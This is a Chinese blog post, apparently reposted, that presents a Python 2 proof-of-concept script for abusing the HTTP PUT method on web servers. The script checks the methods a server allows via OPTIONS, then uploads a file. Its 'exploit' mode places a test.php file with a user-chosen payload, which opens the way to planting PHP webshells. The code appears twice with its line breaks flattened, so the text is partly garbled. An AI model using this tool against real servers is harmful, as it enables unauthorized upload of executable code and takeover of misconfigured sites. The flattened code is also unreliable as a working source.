本文共 6910 字,大约阅读时间需要 23 分钟。
Python 2.7 requests sysWindows 7Apache 已完成put配置。PHP
def main(): if len(sys.argv) < 2 : print u''' Version:1.0 请输入将要验证的URL(eg:Put2Poc.py http://test.com) Put2Poc.py arg1 arg2 arg1:目标URL arg2: 选择(1)验证OR(2)利用(默认为验证) arg3: 选择上传文件的目录,默认为/(eg:/test/) arg4: 设置长传的文件的文件名,默认为test.html arg5:设置特定的利用payload(默认漏洞利用为: ) 注:当前版本仅支持PHP语言的利用''' sys.exit() if len(sys.argv) >= 2 : url = sys.argv[1] YN = 1 path = '/' filename = 'test.html' content = None # print url if 'http' not in url : print u'请输入协议HTTP/HTTPS(eg:Put2Poc.py http://test.com)' sys.exit() if len(sys.argv) >= 3 : # print type(sys.argv[2]) if sys.argv[2] in '2' : filename = 'test.php' if sys.argv[2] not in ['1','2'] : print u'输入的设置有误,请选择正确的设置(1:验证|2:利用)' sys.exit() YN = sys.argv[2] if len(sys.argv) >= 4 : path = sys.argv[3] if len(sys.argv) >= 5 : filename = sys.argv[4] if len(sys.argv) >= 6 : content = sys.argv[5] if len(sys.argv) > 6 : print u'请检查参数设置' sys.exit() r_options = Test2Option(url,YN) if content is not None : Put2File(url,YN,r_options,path,filename,content) else: Put2File(url,YN,r_options,path,filename) # print r_options
参数 code : 请求返回的状态码
def Error2status(code): if 400 <= code < 500: return 4 if 500 <= code < 600 : return 5 if 200 <= code < 400 : return True
参数 url : 请求的URL参数 YN : 选择验证漏洞或者利用漏洞,默认为验证。
def Test2Option(url,YN): try: r = requests.options(url,verify=False,timeout=10) except : print u'Error,请检查链接是否可以访问' sys.exit() r_options = r.headers r_status_code = Error2status(r.status_code) if r_status_code == 4 : print u'%s Client Error for url: %s' % (r.status_code,url) print u'该链接不支持OPTIONS方法' sys.exit() if r_status_code == 5 : print u'%s Server Error for url: %s' % (r.status_code,url) print u'请检查链接是否可以访问' sys.exit() if r_status_code is True : print u'该链接存在不安全的HTTP方法' print r_options['Allow'] return r_options['Allow']
参数 url : 测试的URL参数 YN : 选择验证漏洞或者利用漏洞,默认为验证。参数 r_options : 网站所支持的HTTP请求方法。参数 path : 文件上传位置参数 filename : 文件名参数 content : 自定义文件内容。
def Put2File(url,YN,r_options,path,filename,content=None): url = url.rstrip('/') + path + filename print url headers = { 'Accept': '*/*', 'Accept-Language': 'en-US', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Win32)' } data = '' if YN is '2': data = ' ' if content is not None : data = content r = requests.put(url,headers=headers,data=data) r_status_code = Error2status(r.status_code) if r_status_code == 4 : print u'%s Client Error for url: %s' % (r.status_code,url) print u'服务器禁止上传文件' if r_status_code == 5 : print u'%s Server Error for url: %s' % (r.status_code,url) print u'服务器禁止上传文件' if r_status_code is True : print u'Server status code: %s' %(r.status_code) print u'服务器支持PUT文件上传' print u'文件名: %s' %(filename) print u'文件内容: %s' %(data) print u'文件长传位置为: %s' %(path) print u'文件链接: %s' %(url) print r.content #/usr/bin/env python#coding:utf-8##Author:nw01f#Date:2018.01.11#Version:1.0#import requestsimport sysdef Error2status(code): if 400 <= code < 500: return 4 if 500 <= code < 600 : return 5 if 200 <= code < 400 : return Truedef Test2Option(url,YN): try: r = requests.options(url,verify=False,timeout=10) except : print u'Error,请检查链接是否可以访问' sys.exit() r_options = r.headers r_status_code = Error2status(r.status_code) if r_status_code == 4 : print u'%s Client Error for url: %s' % (r.status_code,url) print u'该链接不支持OPTIONS方法' sys.exit() if r_status_code == 5 : print u'%s Server Error for url: %s' % (r.status_code,url) print u'请检查链接是否可以访问' sys.exit() if r_status_code is True : print u'该链接存在不安全的HTTP方法' print r_options['Allow'] return r_options['Allow']def Put2File(url,YN,r_options,path,filename,content=None): url = url.rstrip('/') + path + filename print url headers = { 'Accept': '*/*', 'Accept-Language': 'en-US', 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Win32)' } data = '' if YN is '2': data = ' ' if content is not None : data = content r = requests.put(url,headers=headers,data=data) r_status_code = Error2status(r.status_code) if r_status_code == 4 : print u'%s Client Error for url: %s' % (r.status_code,url) print u'服务器禁止上传文件' if r_status_code == 5 : print u'%s Server Error for url: %s' % (r.status_code,url) print u'服务器禁止上传文件' if r_status_code is True : print u'Server status code: %s' %(r.status_code) print u'服务器支持PUT文件上传' print u'文件名: %s' %(filename) print u'文件内容: %s' %(data) print u'文件长传位置为: %s' %(path) print u'文件链接: %s' %(url) print r.contentdef main(): if len(sys.argv) < 2 : print u''' Version:1.0 请输入将要验证的URL(eg:Put2Poc.py http://test.com) Put2Poc.py arg1 arg2 arg1:目标URL arg2: 选择(1)验证OR(2)利用(默认为验证) arg3: 选择上传文件的目录,默认为/(eg:/test/) arg4: 设置长传的文件的文件名,默认为test.html arg5:设置特定的利用payload(默认漏洞利用为: ) 注:当前版本仅支持PHP语言的利用''' sys.exit() if len(sys.argv) >= 2 : url = sys.argv[1] YN = 1 path = '/' filename = 'test.html' content = None # print url if 'http' not in url : print u'请输入协议HTTP/HTTPS(eg:Put2Poc.py http://test.com)' sys.exit() if len(sys.argv) >= 3 : # print type(sys.argv[2]) if sys.argv[2] in '2' : filename = 'test.php' if sys.argv[2] not in ['1','2'] : print u'输入的设置有误,请选择正确的设置(1:验证|2:利用)' sys.exit() YN = sys.argv[2] if len(sys.argv) >= 4 : path = sys.argv[3] if len(sys.argv) >= 5 : filename = sys.argv[4] if len(sys.argv) >= 6 : content = sys.argv[5] if len(sys.argv) > 6 : print u'请检查参数设置' sys.exit() r_options = Test2Option(url,YN) if content is not None : Put2File(url,YN,r_options,path,filename,content) else: Put2File(url,YN,r_options,path,filename) # print r_optionsif __name__ == '__main__': main() 转载于:https://blog.51cto.com/dearch/2060336